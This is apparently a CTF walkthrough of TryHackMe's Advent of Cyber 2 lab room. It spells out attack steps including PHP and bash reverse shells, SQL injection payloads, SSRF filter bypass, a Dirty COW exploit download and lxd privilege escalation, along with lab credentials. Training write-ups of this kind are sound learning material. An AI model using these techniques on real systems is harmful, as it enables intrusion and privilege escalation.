-
Notifications
You must be signed in to change notification settings - Fork 0
/
Advent_of_Cyber_2
233 lines (202 loc) · 26.5 KB
/
Advent_of_Cyber_2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
#Advent_of_cyber Walkthrough
Hey Guys! Hope you all doing good.
I will post the solution for the advent of cyber 2 room here after 1 or 2 days of breathing time for you to try by yourself.
Room Link: https://tryhackme.com/room/adventofcyber2
## Important Note: if you still feel its hard and not getting the concepts, kindly post the same in the Issues tab
## Day 1 Solution Steps: A christmas crisis
1. Install browser extensions like ‘edit this cookie’ or any other cookie manager browser add
2. After login to the site - click on the add to view the cookie name (key) with just a one click - rather that going into the dev tools
3. Copy the auth cookie value and navigate to the cyberchef site https://gchq.github.io/CyberChef/ paste the same - a magic stick will appear click on it - it will show the encoded format and the decoded value below
4. The decoded value is in key:value pair in ‘JSON’ format
5. Replace your username in the decoded value with ‘santa’ value and encode the same with ‘Hex’
6. Copy paste the resulted value into your auth cookie and refresh the site - boom! You will logged in as santa user - activate all the button to get the flags
## Day 2 Solution Steps: The elf strikes back.
1. At the end of you machine target IP add ‘/id=ODIzODI5MTNiYmYw’ it will look something like http://<IP>?id=ODIzODI5MTNiYmYw
2. Analysis response page script for the allowed extensions (.jpeg, .png) - the answer is ‘images’
3. Do dirsearch for the target machine with the default scripts or analysis the upload file POST request directory - the answer is ‘/uploads’
4. Upload the php reverse shell - get the php file from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php copy paste the code, edit the IP and port with your machine IP and your wish port and rename the extension as .jpeg.png and upload the same
5. Netcat with the flag ‘-nvlp’ on the same port
6. Access the file in http://<IP>/uploads/<file>.php you will get the reverse shell, cat the flag file in /var/www/flag.txt to get the same
## Day 3 Solution Steps: The Christmas chaos.
1. Load the target site IP into your browser
2. Configure the browser proxy with burp as instructed in the room
3. Give some test credentials in the login page and capture the request in burp
4. Sent the request to intruder by pressing ‘Ctrl+i’ then do the necessary steps to brute force the username and password as instructed in the room description
5. Start the attack, after the attack completes analys the length of the response - one response will have a lesser response length
6. Select that response and analysis it will redirect to the site post successful login - note the username and password and use the same to login to the site - you will get the flag for this task
## Day 4 Solution Steps: Santa's watching
1. For the question “Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)” - construct the command which will look like “wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ”
2. For the question “Use GoBuster (against the target you deployed -- not the shibes.xyz domain) to find the API directory. What file is there?” run the following command “gobuster dir -u http://10.10.247.63/api/ -w /usr/share/wordlists/dirb/big.txt -x php,txt” which will give 200 response code for the file ‘site-log.php’
3. To get the correct date we have to fuzz the date parameter from the API endpoint http://<IP>/api/web-log.php?date=?
4. Run the below wfuzz command to get the correct date
‘sudo wfuzz -c -z file,wordlist -u http://10.10.247.63/api/site-log.php?date=FUZZ --hw 0’
## Day 5 Solution Steps: Someone Stole Santa's Gift list
1. For the 1st we have guess for that we can use the general used in the site and website context - use hint for the same (as it says two words from the question) - ../santapanel will get you the site
2. On the login page use the sql command [ ‘ OR 1=1 /* ] on the username and leave the password blank - this will take you into the site as the default user (may be admin)
3. On the website again use the same payload [ ‘ OR 1=1 /* ] this will create a true statement and will list all the entries available in the gift database - count it and enter the same
4. From the list for the name ‘paul’ we have ‘Github ownership’ as the gift enter the same
5. Give some text at the search field and capture the request using the burp - Right click and save the request - on the sqlmap provide the comment sudo ‘sqlmap -r sqlrequest --batch --level 3 --risk 3 --dump’ to get the flag and admin password
## Day 6 Solution Steps: Be Careful with what you wish on a christmas night
1. In the wise filed we have the stores XSS where our payload getting stored in BD with being sanitized at the client and server end
2. Our payload are getting reflected back in to the site on the query parameter ‘q’
3. Open the ZAP proxy application and paste the URL into the automated scan and click on scan for the automated scanning - once the scan completes click the alert tab available at the bottom pan where you can see the potentials vulnerabilities (here we have 5) - In those 2 are related to XSS
## Day 7 Solution Steps: the Grinch really did steal a christmas
1. Download the zip file from the challenge and unzip it - open the pcap1 file with wireshark tool and apply the filter ‘icmp’ to get all the ICMP related packets
2. For the question 2 we have to give the filter as ‘http.request.method == GET’ (gap and capital letters are important)
3. Apply the above filter and click on file > export object > http - select the /post/reindeer-of-the-week file and save the same as <file>.html - open this file with any browser and on analysing the content header it is about the topic ‘Reindeer-of-the-week’ performance letter in a internal blog post
4. Open the pcap2 file with wireshark and apply the filter ftp - analyse the traffic we can see a wrong password being entered error replay from the ftp server the password is ‘plaintext_password_fiasco’
5. If you try to see the content of SSH protocol you can’t as its been encrypted - answer for the 5th question
6. Open the pcap3 file and apply the filter http - check for the ‘/christmas.zip’ file packet in the request and export the same under http protocol - save the content in .zip format - when you extract and open the file wishlist.txt you can see the wishes of McSkidy. Where he want to replace ‘rubber ducky’
## Day 8 Solution Steps: whats under the chrismas tree.
1. Snort is a free open source network intrusion detection system (IDS) and intrusion prevention system (IPS) created in 1998 by Martin Roesch, founder and former CTO of Sourcefire. Snort is now developed by Cisco, which purchased Sourcefire in 2013.
2. Run the nmap against the target - ‘sudo nmap <IP>’ we will get port 80, 2222 and 3389.
3. For the question 3 and 4 run the nmap commands ‘sudo nmap -Pn <IP>’ , ‘sudo nmap -A <IP>’ and ‘sudo nmap -sV <IP>’ and analyze the result which will provide answers for the rest of the questions
4. From the ‘sudo nmap -sV <IP>’ result we can view that on the port 2222 ubuntu variant of Linux server is running
5. On the scan ‘sudo nmap -A <IP>’ under port 80 you can see the HTTP-TITLE as ‘Internal Blog’ - so the website is based on Blog format
## Day 9 Solution Steps: Anyone can be Santa!
1. Connect with the target ftp server IP using the command ‘ftp <IP>’ for the username provide anonymous and it won’t ask for the password
2. Navigate to the ‘public’ dir with command ‘cd public’ and download the two files using the command ‘get backup.sh’ and ‘get shoppinglist.txt’ - both the file will be downloaded to our local machine
3. Open both the file and analysis the same - in the file backup.sh it written that this file will be executed for every minute and the final backup will be done at the end of the day
4. Replace the content in the ‘backup.sh’ with the bash reverse shell comment ‘bash -i >& /dev/tcp/Your_TryHackMe_IP/4444 0>&1’ to get the shell on the machine
5. For the 1st question the answer is ‘public’ same as the directory we got these details
6. For the 2nd question the answer is ‘backup.sh’ as we know this file is running every minutes
7. Open the shoppinglist.txt and paste the same for the question 3
8. Listen via netcat on you local machine once the connection established - cat /root/flag.txt and paste the same for the question 4
## Day 10 Solution Steps: Don't be selfish!
1. To get the user list use enum4linux with the following commands ‘enum4linux -U <target IP>’ - this will list all the users and their account for the samba share
2. To get the share folder list use enum4linux with the following commands ‘enum4linux -S <target IP>’ - this will list all the share folders available in the samba share
3. Try access all the share as some share won’t require password to access it - use the smbclient tool with the command ‘smbclient //<target Ip>/<folder name>’ - press enter if it request to enter password
4. As we know we are able to access the tbfc-santa folder without password - enumerate further on this folder - use the command to access the folder ‘smbclient //10.10.23.174/tbfc-santa/’ then give commands like ‘ls’ and more to access the file inside the shared directory.
## Day 11 Solution Steps: The Rogue Gnome
1. If the privilege escalation involves using a user account to execute commands as an administrator its called vertical privilege escalation
2. The name of the file that contains a list of users who are a part of the sudo group is sudoers
3. Login to the machine with SSH for the provided credentials
4. Use the find command to get the SUID files ‘find / -u=s -file f 2>/dev/null’ it will list many file and binaries where we can run those as root - in that bash is stands out
5. Search for SUID in the GTFObin site for the bash binary - we can run the bash command like ‘bash -p’ in the provided shell to get the root access shell (bash shell with root access) - cat the flag.txt under /root/ directory
## Day 12 Solution Steps: Ready, set, elf.
1. Do an nmap scan on the target with -A flag and look at the web server version on the port 8080 (Apache tomcat 9.0.17)
2. Do google search for the vulnerabilities in the apache tomcat 9.0.17 version you will get some (2 vulnerabilities one is in yr 2017 and another in 2019) - the CVE witch is related to the RCE /cgi-bin/ - CVE-2019-0232 is the one for this server
3. Boot the msfconsole in your kali (attacking machine) search for tomcat 9.0 you will get 1 explicit use the same through cmd ‘use 1‘ and set all the options like RHOST, LHOST , TARGETURI - we have to go gobuster to get this target in actual case as there is a hint given for this challenge - use /cgi-bin/elfwhacker.bat and run the exploit to get the meterpreter shell
4. From the meterpreter shell Cat the flag file available in the cgi-bin folder
5. From the same meterpreter shell type ‘use priv’ to load the privilege escalation scripts then type ‘getsystem’ to escalate to admin - type ‘getuid‘ to confirm the same or run
## Day 13 Solution Steps: Coal for christmas
1. Nmap the target with command nmap <target IP> and it has 3 open ports in the first 1000. Where we have port 23 (telnet port) - not been used as it has been replaced by SSH
2. As the port telnet is open - we can grap the banner is they have any connect to the target IP using the telnet command as ‘telnet MACHINE_IP <PORT_FROM_NMAP_SCAN>’ - you will get the username and password to access the machine - connect to it either using the telnet or SSH
3. After SSH'd into the machine use the command ‘cat /etc/lsb-release’ to get the machine OS version - ubuntu 12.04
4. On the current directory cat the cookies_and_mike.txt and answer for the question - Grinch
5. As we have older version of OS (current version is >20.0) we can do kernel exploit called ‘Dirty COW (CVE-2016-5195)’ - to get the exploit (.c) file wget the same using the cmd ‘wget https://github.com/FireFart/dirtycow/blob/master/dirty.c’ after getting the file complete the same as exeutble using gcc as follow ‘gcc -pthread dirty.c -o dirty -lcrypt’
6. When you execute the exploit ‘./dirty’ you will be prompt for a password for the default user created ‘firefart’ provide the same and proceed further
7. After the exploit execution - switch to the firefart user using the cmd ‘su firefart’ - BOOM! You are root now - verify the same with cmd ‘id’
8. Now on the same directory create a file ‘coal’ using the cmd ‘touch coal’ then type as follow ‘tree | md5sum > coal’ then ‘cat coal’ to get the hash for the final question of the day
## Day 14 Solution Steps: where's Rudolph
1. Google search the rudolph user name - IGuidetheClaus with the reddit tag, it will bring up the profile - navigate to comments - Reddit comments: https://www.reddit.com/user/IGuidetheClaus2020/comments/
2. Analysis the comments made by rudolph from there we can see it was born in chicago
3. Google search: “robert creator full name - chicago rudolph” to get the creator’s last name - as he wrote a boot with respect to rudolph his will bring up his wiki page
4. On the site namechk https://namechk.com/ enter the username where it shows the other social media sites where it has the same username - where you can see twitter is greyed out
5. Navigate to that twitter handel and grep the username - Twitter handel: https://twitter.com/iguideclaus2020
6. On analysing the twitter field we came to know Rudolph's favorite TV show appears to be bachelorette
7. Download the image that he attached during the parade and use google reverse search to get the details regarding the image or Use exiftool to get the image information regarding the location - copy past in the google map to get the location - chicago
8. To get the flag use exiftool with the cmd ‘exiftool <image>, the flag will be available under copyright - {FLAG}ALWAYSCHECKTHEEXIFD4T4
9. Use the Online exiftool: http://exif.regex.info/exif.cgi upload the image and note down the location co-ordinates - 41.891815, -87.624277
10. Copy paste the above co-ordinates and look for the near by hotel with the name ‘Magnificent Mile’ give the hotel streen number - 540
## Day 15 Solution Steps: There's a python in my stocking !
1. The output of True+True is 2 - In python the value ‘True’ will be considered as value 1 and ‘False’ will be considered as 0 in the arithmetic operation.
2. The database for installing other people's libraries called Pypi and its available in https://pypi.org/ Community
3. The output of bool(“False”) - the bool() function will determine whether something is inside or not based on that output as True or False - as we passed the string with the value “False” it will o/p as True - if you passed the empty string then it will output it as False
4. The library used to download the HTML of a webpage is requests
5. The o/p of the below code is [1, 2, 3, 6] because we are passing the variable x to y as pass by reference (default python behaviour) so any changes made to the value of y will get reflected to variable x after execution
x = [1, 2, 3]
y = x
y.append(6)
print(x)
6. ‘Pass by Reference’ is the reason behind the previous question o/p
## Day 16 Solution Steps: Help! where is Santa.
1. Do nmap on the target to get the web server port - cmd ‘nmap <target IP>’ - port 8000 is open
2. Navigate to the website ‘http://<IP>/static/index.html’ Right click on the same and click view page source - on analysis we can see an valid url http://machine-ip/api/api-key - so the directory has to be like /api/
3. Write the below script in a python file and run the same
# Importing
import requests
for api_key in range (1,100,2):
# requests.get downloads the webpage and stores it as a variable
html = requests.get(f'http://10.10.95.40:8000/api/{api_key}')
print (html.text)
4. This will loop through the API key in odd numbers from 1-100 and you will get the valid response on key number 57
Enter the url ‘http://IP/api/57’ you will get the santa location - winter wonderland, hyde park, London
## Day 17 Solution Steps: ReverseELFneering
1. Load the radare2 with the challenge1 file in debug mode with the command ‘r2 -d ./challenge’
2. Provide the ‘aa’ command to do a complete analysis
3. See all the involved in the program with the command ‘afl’ if what to see main function related the do ‘afl | grep main’
4. Decompose the main function with the command ‘pdf @main’ - we have 3 variable and some operation in it
5. From the instruction we can say the value of local_ch when its corresponding movl instruction is called is 1
6. The value of eax when the imull instruction is called is 6 as the value of eax (1:from instruction 5) and local_ch (6: from instruction 3) is getting multiplied and assigned to eax, so 1x6 is 6.
7. The value of local_4h before eax is set to 0 is 6 as the value of eax (6) from instruction 6 is assigned to local_4h on instruction 7
## Day 18 Solution Steps: The Bits of Christmas
1. Login to the target system using xfree RDP with the cmd ‘xfreerdp /u:cmnatic /p:Adventofcyber! /cert:ignore /v:10.10.67.163’
2. On the desktop open the ‘TBFC_App’ it will ask for a password - to get the same load the ILSpy application and load the application from the desktop
3. Decompile the application and view the various function and methods used - in this CrakMe function looks different
4. Decomplite the same and look at the ButtonActive_Click method where we can see the print statement of the application after successful login and for the failure attempt - flag thm{046af}
5. Observe the third line where we can see some strings which look like a password - santapassword321 - copy and paste the same in the application - where it will give you the flag
## Day 19 Solution Steps: Thenaughty or Nice List
1. Connect to the THM VPN and load the target IP in your browser - in the landing page search for any text and the URL will look like ‘http://10.10.99.122/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3Dtest ’
2. Note the proxy parameter - here the site server takes the input and search it locally with the internal domain name list.hohoho on the port 8080
3. Change the port to some other port and observer the result and change the domain like ‘localhost’ or ‘127.0.0.1’ and observe the result
4. For any of the host or port the server is blocking other then list.hohoho - this can be bypassed by making this domain as the subdomain to some other domain and passing the request to that domain (our controlled domain so we can resolve the same to a Site IP or to a localhost) - A prebuilt domain for this is localtest.me, where all its domain and subdomain is resolve to local host (127.0.0.1)
5. Use the above step to bypass the URL will look like - http://10.10.99.122/?proxy=http%3A%2F%2Flist.hohoho.localtest.me%3A%2F this URL will give you the password to login as admin (Santa:Be good for goodness sake!)
6. Login with the same and click on the DeletList Button to get the flag
## Day 20 Solution Steps: PowershELlf to the rescue
1. Connect to the machine using SSH and change the shell to powershell
2. To get the first hidden elf file navigate to ‘Documents’ directory and use the cmd 'get-childitem -hidden’ to list the hidden files and open the same with the cmd ‘get-content e1fone.txt’ - 2 front teeth
3. Navigate to desktop folder and use cmd ‘get-childitem -directory -hidden’ you will get ‘elf2wo’ as hidden folder, then navigate into in and open the hidden file with the cmd ‘get-content <.txt>’ - Scrooged
4. To get the hidden directory under windows folder - navigate to windows directory and use the cmd ‘get-childitem -hidden -directory -recurse -erroraction silentlycontinue filter ‘*3*’’ this command will fetch all the hidden directory with the name 3 in it under windows directory recursively - you will get ‘3lfthr3e’ as the folder name
5. To get the word count - navigate into the folder with cmd ‘set-location 3lfthr3e’ then use cmd ‘get-content .\1/txt | measure-object -word’ - 9999
6. To get the words at the index 551 and 6991 use the cmd (get-content .\1.txt)[551] and (get-content .\1.txt)[6991] respectively - red ryder
7. To get the second half of the answer use the cmd ‘get-content .\2.txt | select-string -pattern “redryder”’ you will get ‘redryderbbgun’ as the filtered text - red ryder bb gun
## Day 21 Solution Steps: Time for some ELForensics
1. To read the content of the original hash stored in the text file, use the cmd ‘get-content .\db file hash.txt’
2. To get the hash of the executable use the command ‘get-filehash -algorithm md5 .\deebee.exe’
3. To find the hidden flag inside the executable run the cmd ‘strings64.exe -accepteula .\deebee.exe’ - the flag will be at above the stream cmd
4. When you run the executable with WMIC.exe for the stream ‘hidedb’ with the cmd ‘WMIC.exe process call create $(Resolve-Path .\deebee.exe:hidedb)’ this will pop a command prompt and show you the flag
## Day 22 Solution Steps: Elf McEager became cyberchef
1. RDP into the target system - on the desktop folder we have long string of characters as the folder name copy the folder name and decode the same using cyberchef tool - copy the folder name and paste it in the site : https://gchq.github.io/CyberChef/ a magic icon will be appeared on the decode pane click the same you will get the decoded value - password - thegrinchwashere
2. The left pane shown the info regarding the method used to decode the value - it shows as ‘base64’
3. After login to the Keepass database - click on the network and double click on the service name you will get the password - make the password visible by clicking the 3 dots in line with the password field - copy the value and paste in the cyberchef - click the magic icon and get the password - sn0wM4n! (the encoded method used is Hex)
4. Double click on the mail from the popup copy the password and paste the same in the cyber chief - click the magic icon to get the decoded password - ic3Skating! (the encoded method used is HTML entity)
5. Double click home banking and copy the description - copy only the numbers and select the charcode decode with and set the base as 10 to get further char encoded numbers - again repeat the process and you get a github url for fetching the flag
https://gist.githubusercontent.com/heavenraiza/1d321244c4d667446dbfd9a3298a88b8/raw/7d98f2354f3d36e7122e4cb16f39a39d03392a0e/cyberelf
## Day 23 Solution Steps: The Grinch Strikes again!
1. Connect the machine via RDP and on the desktop there is a file with name Ransomware note - open it and copy the bitcoin address - decode it with base64 you will get ‘nomorebestfestivalcompany’
2. Navigate to Documents > confidential > see the file extension - .grinch
3. On the scheduled task we saw a weird suspicious name in it - opidsfsdf
4. On the scheduled task ‘opidsfsdf’ under action pane you can see the running task location - c:\Users\administrator\desktop\opidsfsdf.exe
5. On the task ShadowCopyVolume - under general you can see the volume ID {7a9eea15-0000-0000-0000-010000000000}
6. When you give the hidden partition a letter (Z) and toggle the hidden file to show you will get a folder called ‘confidential’
7. Right click the confidential folder and under properties > previous version > restore - the older file will get stored in the same folder - navigate to the same folder and read the password (master) - m33pa55w0rdIZseecure!
## Day 24 Solution Steps: The trail before Christmas
1. Done the namp and found port 80 and 65000 are opened
2. The http-title for the website server running on port 65000 is light-cycle
3. Done gobuster for the wordlist of /usr/share/wordlist/dirbuster/directory-2.3-medium.txt for the file type php
4. We got index.php, uploads.php, asserts, api and grid as result where ‘uploads.php’ is the file upload hidden php page
5. The directory ‘/grid’ where the upload files are getting saved
6. Load the /uploads.php’ webpage with the burp proxy interception where you can see 2 .js file (filter.js and upload.js) will get loaded along with the uploads.php file - here we have drop the filter.js file and sent the other request
7. Create a reverse shell php file with the listening port of you machine IP and any port and name the file extension as ‘.jpg.php’ extension to bypass the filter
8. The uploaded file will be available at /asset directory load the same and trigger the reverse shell
9. On the shell navigate to /var/www and cat the web.txt for the flag - THM{ENTER_THE_GRID}
10. Upgrade the shell with the following command
Python3 -c ‘import pty; pty.spawn(“/bin/bash”);’
Ctrl +Z
Stty raw -echo; fg
Export TERM=xterm
11. To get the db username and password navigate to /TheGrid/include and cat the ‘dbauth.php’ file where we get the username and password as - tron:IFightForTheUsers
12. To get the databases in the machine - use the command ‘mysql -h’ check whether the database is installed or not - as its available give the command ‘mysql -utron -p’ for the password provide the ‘IFightForTheUsers’ and get the mysql shell interface - To get the database use the cmd ‘show databases;’ - you will get ‘tron’ as DB
13. Get the password and username from the users in the DB - select the db with the cmd ‘use tron;’ then use the cmd ‘show tables;’ where you will see the ‘users’ table - get all the details in the users table with the cmd ‘SELECT * from USERS’ - you will get ‘flynn:edc621628f6d19a13a00fd683f5e3ff7’
14. Crack the hash using the online tool crachstation crack the hash - @computer@
15. With the cracked password switch to the new user flynn:@computer@ and cat the user.txt available at flynn’s home folder - THM{IDENTITY_DISC_RECOGNISED}
16. Check the user group with the cmd ‘id’ - lxd group
17. Follow the lxd group linux privilege escalation steps as follow
lxc init Alpine test -c security.privileged=true
lxc config device add test tester disk source=/ path=/mnt/root recursive=true
lxc start test
lxc exec test /bin/sh
cd /mnt/root/root
18. You will get the root directory as the image root user - as per the system we will act as the root and we navigate back to the host system directory via cmd ‘cd /mnt/root/root’ - cat the root flag - THM{FLYNN_LIVES}
## Day 25: Thank you. If possible give a star :)